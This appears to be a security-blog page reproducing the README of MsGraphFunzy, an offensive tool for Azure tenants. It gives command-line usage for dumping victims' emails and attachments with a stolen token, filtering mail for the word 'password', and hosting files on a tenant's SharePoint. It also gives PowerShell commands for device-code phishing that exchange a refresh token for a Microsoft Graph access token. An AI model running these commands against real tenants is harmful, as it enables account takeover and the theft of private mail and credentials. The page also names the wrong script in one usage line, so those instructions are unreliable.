MsGraphFunzy – A Guide To Automating Email Dumps And SharePoint Hosting On Azure

Script to dump emails through Microsoft Graph API. it also include another script to push a file on the Azure tenant.

Usage graph_dump.py

This script dump emails and attachments

python3 graph_dump.py extended_azure_token_file_path (optional filter)

Filter Examples

'$search="body:password"'
'$search="subject:password"'
'$search="attachment:password"'

python3 graph_dump.py extended_azure_token_file_path '$search="body:password"'

Usage push_sharepoint.py

This script can be used to host on file on an Azure tenant

python3 extract_email.py extended_azure_token_file_path file_to_upload_path remote_filename (optional -organization)

Device Code Phishing Extended Scope

PS> install-module aadinternals
PS> import-module addinternals
PS> $t = Get-AADIntAccessTokenWithRefreshToken -clientid "d3590ed6-52b3-4102-aeff-aad2292ab01c" -resource "https://graph.microsoft.com" -tenantid "" -refreshtoken "" -savetocache 1 -includerefreshtoken 1
PS> Write-Output $t

PwnedOrNot : OSINT Tool to Find Passwords for Compromised Email Addresses

April 17, 2019

In "Kali Linux"

PwnedOrNot : OSINT Tool To Find Passwords For Compromised Email Addresses

August 21, 2019

In "Kali Linux"

Entraspray – Enhancing Password Spraying Tools For Microsoft Azure Security

July 26, 2024

In "Cyber security"

Varshini

Varshini is a Cyber Security expert in Threat Analysis, Vulnerability Assessment, and Research. Passionate about staying ahead of emerging Threats and Technologies.